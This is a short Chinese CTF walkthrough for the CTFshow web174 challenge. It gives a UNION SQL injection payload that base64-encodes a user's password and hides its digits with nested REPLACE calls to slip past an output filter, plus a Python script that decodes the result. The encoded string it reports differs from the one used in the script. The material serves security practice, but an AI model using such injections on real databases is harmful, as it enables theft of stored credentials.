CTFSHOW web入门——web174

查看函数，返回值把0-9的数字和flag给过滤了

 可以先用base64进行加密

0' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username="flag" --+
 

replace（）函数用法：
REPLACE ( string_expression , string_pattern , string_replacement )
参数：
string_expression：字符串表达式
string_pattern：想要查找的子字符串
string_replacement：想要替换成的子字符串

 得到了Y@CRmc@Bhvd@CtmZTAyOGNjMy@AiNDgzLTQ@ENWQtOTc@AOS@JxMDcyMmUzZjVjMDF@I

脚本替换回原来的flag

import base64

flag64 = "Y@CRmc@Bhvd@CsyNjZiN@BU@JYy@J@EZTJiLTQzOGEtODg@EZC@J@CYjc@AMTZhNTBkMzR@I"
flag = flag64.replace("@A", "1").replace("@B", "2").replace("@C", "3").replace("@D", "4").replace("@E", "5").replace("@F", "6").replace("@G", "7").replace("@H", "8").replace("@I", "9").replace("@J", "0")

print(base64.b64decode(flag))

获得flag